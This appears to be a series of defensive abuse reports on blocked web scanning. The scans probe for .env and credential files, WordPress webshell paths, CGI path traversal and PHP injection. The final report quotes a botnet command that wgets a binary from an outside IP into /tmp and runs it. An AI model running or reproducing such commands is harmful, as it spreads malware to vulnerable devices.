Observed systematic automated reconnaissance (T1595) targeting sensitive environment configuration artifacts. Forensic analysis identifies unauthorized GET requests directed at /.env and /.env.backup, indicating intent to exfiltrate application credentials and server-side secrets. The activity was intercepted by ModSecurity (Rule ID 210492) following high-frequency violations of global generic security policies. All malicious ingress attempts were successfully neutralized at the application boundary, resulting in HTTP 403 Forbidden response codes.
Observed systematic automated reconnaissance (T1595) and vulnerability discovery targeting web application administrative interfaces and configuration artifacts. Forensic analysis identified repeated unauthorized GET requests for sensitive endpoints including /admin.php and /config.php, indicating intent to locate backdoors or harvest server-side configuration data. Global threat intelligence correlates this activity with high-confidence automated abuse profiles, showing 100% confidence of malicious intent from multiple security vendors. All ingress attempts were successfully neutralized at the application and security layer, resulting in HTTP 403 Forbidden and 404 Not Found response codes.
Observed systematic automated reconnaissance (T1595) and vulnerability discovery targeting high-value WordPress plugin artifacts. Forensic log analysis identifies repeated GET requests for /wp-content/plugins/hellopress/wp_filemanager.php and /xxx.php, indicative of unauthorized path discovery for potential webshell delivery or plugin exploitation. Correlation with global threat intelligence confirms a high-persistence malicious actor with 100% abuse confidence and thousands of historical reports. All malicious ingress attempts were successfully neutralized, returning HTTP 404 response codes.
Observed systematic automated reconnaissance and information disclosure attempts (T1595) targeting sensitive environment configuration artifacts. Forensic logs identify unauthorized GET requests directed at the /.env file, indicating clear intent to harvest application credentials and server-side secrets. Associated activity included structural mapping via probes for /sitemap.xml to identify unlinked application components. All malicious ingress attempts were successfully neutralized, resulting in HTTP 403 Forbidden and 404 Not Found response codes.
Observed persistent automated reconnaissance (T1595) targeting specific WordPress plugin vulnerabilities and administrative PHP artifacts. Forensic log analysis identifies over 320 correlated events probing for high-interest endpoints, specifically /wp-content/plugins/hellopress/wp_filemanager.php and /chosen.php, indicative of unauthorized path discovery for potential webshell delivery. Correlation with global threat intelligence confirms a 100% abuse confidence rating consistent with bot-driven vulnerability scanning campaigns. All malicious ingress attempts were successfully neutralized at the application boundary, resulting in HTTP 404 response codes.
Observed systematic automated reconnaissance (T1595) targeting specific WordPress plugin vulnerabilities and administrative PHP artifacts. Forensic log analysis identifies high-frequency probing (400+ correlated events) for sensitive paths including /wp-content/plugins/hellopress/wp_filemanager.php and /chosen.php, indicative of unauthorized path discovery and webshell scanning attempts. Threat intelligence correlation validates this source as a persistent malicious actor with a 100% abuse confidence rating. All ingress attempts were effectively neutralized at the application boundary, resulting in HTTP 404 response codes.
Observed high-frequency automated reconnaissance and exploitation attempts (T1595) targeting the /app/ endpoint via persistent HTTP POST requests. Forensic analysis confirms systematic brute-force activity (T1110) consistent with unauthorized credential stuffing or API abuse, as evidenced by 60 correlated events within a single detection window. Global threat intelligence correlation validates this source as a high-confidence malicious actor with extensive multi-vector campaign history. All unauthorized ingress attempts were successfully intercepted and neutralized, resulting in HTTP 403 Forbidden response codes.
Observed systematic automated reconnaissance (T1595) targeting the mod_pagespeed module to identify potential Server-Side Request Forgery (SSRF) or Open Redirect vulnerabilities. Forensic log analysis confirms unauthorized POST requests directed at /mod_pagespeed_beacon with URL parameters pointing to internal Roundcube webmail artifacts, indicating an attempt to probe or pivot into mail infrastructure metadata. While external threat intelligence reflects low confidence, the behavioral artifacts represent clear automated vulnerability research (T1190). All malicious ingress attempts were successfully neutralized at the application tier, resulting in HTTP 403 Forbidden responses.
Observed systematic automated reconnaissance (T1595) and high-criticality exploitation attempts targeting container infrastructure and legacy CGI binaries. The actor utilized HTTP/1.1 GET requests for /containers/json to map Docker environments and a POST request featuring recursive path traversal (/%2e%2e/) toward /cgi-bin/ aimed at executing /bin/sh for Remote Code Execution (RCE). Correlation with global threat intelligence confirms a 100% abuse confidence rating with extensive historical evidence of multi-vector brute-force campaigns. All malicious ingress attempts were successfully neutralized, resulting in HTTP 400 and 404 response codes.
Observed systematic automated reconnaissance (T1595) targeting cloud infrastructure configuration and sensitive secrets. Forensic analysis identifies unauthorized GET requests for high-value artifacts including /.aws/credentials and /secrets.json, indicating a clear intent to harvest credentials or exfiltrate architectural metadata. Threat intelligence correlation validates a persistent malicious profile with a 100% abuse confidence rating across multiple security vendors. All ingress attempts were effectively neutralized at the application boundary, resulting in HTTP 403 and 404 response codes.
Observed systematic automated reconnaissance (T1595) targeting WordPress infrastructure and administrative PHP artifacts. Source utilized GET requests to probe for /wp-links-opml.php and /wp-content/themes/theme/about.php, indicating active scanning for potential webshells or unlinked administrative components. Correlation with global threat intelligence confirms high-volume abuse reports consistent with bot-driven directory traversal and unauthorized probing. All malicious requests were successfully neutralized, resulting in HTTP 404 response codes.
Observed systematic automated reconnaissance (T1595) and high-criticality exploitation attempts targeting web server infrastructure. The actor utilized automated tooling (libredtail-http) to execute a POST request featuring recursive path traversal (/%2e%2e/) aimed at /cgi-bin/bin/sh for Remote Code Execution. Additionally, targeted probes were identified against /index.php seeking to exploit ThinkPHP invokefunction vulnerabilities. Forensic correlation with threat intelligence confirms a 100% abuse confidence rating with persistent malicious behavior. All ingress attempts were successfully neutralized at the application tier, resulting in HTTP 400 and 404 response codes.
Observed systematic automated reconnaissance (T1595) and brute-force activity targeting web application infrastructure. Forensic log analysis identifies repeated POST requests directed at /api/route and /_next endpoints, indicating active probing for Next.js framework vulnerabilities or unauthorized API interaction. Third-party threat intelligence confirms this source is associated with high-confidence web application brute-force campaigns (T1110). All malicious ingress attempts were effectively neutralized at the application tier, resulting in HTTP 404 response codes.
Observed aggressive automated reconnaissance and multi-vector web application exploitation attempts (T1595/T1190). Forensic analysis identified directory traversal and Local File Inclusion (LFI) probes targeting the 'lang' parameter at /index.php, alongside a sophisticated PHP injection attack against /hello.world utilizing the php://input I/O stream for unauthorized code execution. ModSecurity (Rule ID 218420) successfully intercepted the malicious payload, effectively neutralizing the threat with an HTTP 403 Forbidden response.
Observed systematic automated reconnaissance and sensitive file discovery (T1595/T1005) targeting version control metadata. Forensic log analysis confirms unauthorized GET requests directed at the /.git/config artifact, indicating clear intent to exfiltrate repository configuration details and potential secrets. The activity was intercepted by ModSecurity (Rule ID 210492) following high-frequency probing of hidden directories. All malicious requests were successfully neutralized, resulting in HTTP 403 Forbidden status codes.
Observed systematic automated reconnaissance (T1595) targeting sensitive environment configuration artifacts. Forensic analysis identifies unauthorized GET requests for /.env.backup and /.env.production, indicating clear intent to exfiltrate credentials and server-side secrets. The activity triggered ModSecurity Rule 210492 (Global Generic Rules) following multiple policy violations. All malicious ingress attempts were successfully mitigated with HTTP 403 Forbidden responses, resulting in a permanent firewall-level IP ban.
Observed systematic automated reconnaissance (T1595) and information disclosure attempts targeting sensitive environment and configuration artifacts. Forensic analysis identifies unauthorized GET requests for /.env.backup and /config/secrets.yml, indicating clear intent to harvest credentials or sensitive architectural metadata. Activity was intercepted by ModSecurity (Rule ID 210492) following multiple violations of global generic security policies. All ingress attempts were neutralized with HTTP 403 response codes, concluding in a permanent firewall-level IP ban.
Observed systematic automated reconnaissance (T1595) and vulnerability probing targeting WordPress application artifacts. Forensic log analysis identifies the source attempting to locate and exploit specific plugin vulnerabilities, including attempts to access /wp-content/plugins/hellopress/wp_filemanager.php and /class-wp-image.php. The activity is consistent with bot-driven directory traversal and unauthorized webshell probing aimed at achieving initial access or persistence. All malicious ingress attempts were effectively neutralized at the application tier, resulting in HTTP 404 response codes.
Observed automated reconnaissance (T1595) targeting WordPress plugin directories and unlinked PHP artifacts. Forensic log analysis identifies systematic probing for potential webshells or backdoor components, specifically targeting /wp-content/plugins/fix/up.php and /NewFile.php. This behavior is indicative of automated bot-driven vulnerability research aimed at establishing persistence or exploiting misconfigured file upload handlers. All malicious ingress attempts were successfully mitigated with the server returning HTTP 404.
Observed systematic automated reconnaissance and path discovery (T1595) targeting specific web application artifacts. Forensic logs identify the actor probing for suspicious PHP scripts including /themes/zMousse/otuz1.php and /xxx.php, indicating intent to locate webshells or unlinked administrative interfaces for exploitation. Correlation with global threat intelligence confirms a high-confidence malicious profile with a history of automated abuse. All unauthorized ingress attempts were successfully mitigated at the application tier, resulting in HTTP 404 status codes.
Observed automated reconnaissance and vulnerability probing (T1595.002) targeting WordPress application infrastructure. Forensic analysis identified the actor attempting to locate webshell artifacts and exploit paths, specifically probing for /wp-content/uploads/wpr-addons/forms/b1ack.php and /NewFile.php. This indicates clear intent to identify vulnerabilities in specific plugins (e.g., Royal Elementor Addons) for unauthorized file inclusion or persistence. All ingress attempts were neutralized, resulting in HTTP 404 response codes.
Observed systematic automated reconnaissance (T1595) and exploitation attempts targeting web infrastructure. Forensic logs identify a high-criticality POST request utilizing recursive path traversal sequences (/%2e%2e/) toward /cgi-bin/ aimed at executing /bin/sh for Remote Code Execution (RCE). Secondary activity included unauthorized enumeration of container metadata via the /containers/json endpoint. Correlation with threat intelligence confirms a 100% abuse confidence rating with multiple malicious flags from primary security vendors. All ingress attempts were successfully neutralized at the application tier, resulting in HTTP 400 and 404 response codes.
Observed systematic automated reconnaissance and exploitation attempts (T1595/T1059.004) targeting web infrastructure. Forensic logs indicate the source utilized the 'libredtail-http' agent to probe for Docker API artifacts via /containers/json and attempted a high-criticality path traversal attack (/%2e%2e/) against /cgi-bin/ aimed at executing /bin/sh for Remote Code Execution (RCE). Threat intelligence confirms a 100% abuse confidence score with multiple malicious flags from primary security vendors. All unauthorized requests were effectively neutralized, resulting in HTTP 404 and HTTP 400 response codes.
Malicious source (ISP: Celcom Axiata Berhad) identified executing automated reconnaissance and unauthorized probing of sensitive URI artifacts (MITRE T1083). Forensic telemetry reveals persistent targeting of the /wp-login.php endpoint, indicative of CMS account enumeration or brute-force intent. Multi-vendor threat intelligence (VirusTotal 13/94) confirms the IP is associated with high-confidence bad web bot activity and distributed web application attacks. All unauthorized interaction attempts were successfully neutralized by local security policies, resulting in continuous HTTP 404 Not Found responses.
Malicious actor (ISP: ETCLOUDS LIMITED) identified executing automated remote command injection targeting the /device.rsp IoT endpoint. Forensic analysis of SIEM logs reveals a POST request carrying a shell command sequence (cd /tmp; wget http://156.229.165.225/alyssaaarm7; chmod 777; ./alyssaaarm7) designed to achieve initial access and deploy a malicious binary (MITRE T1190, T1055). This TTP is characteristic of automated botnet propagation campaigns seeking to exploit vulnerable network-attached devices. The attack was successfully neutralized by the ModSecurity WAF, resulting in a consistent HTTP 403 Forbidden response.
Bad Web Bot, Web App Attack, IoT Targeted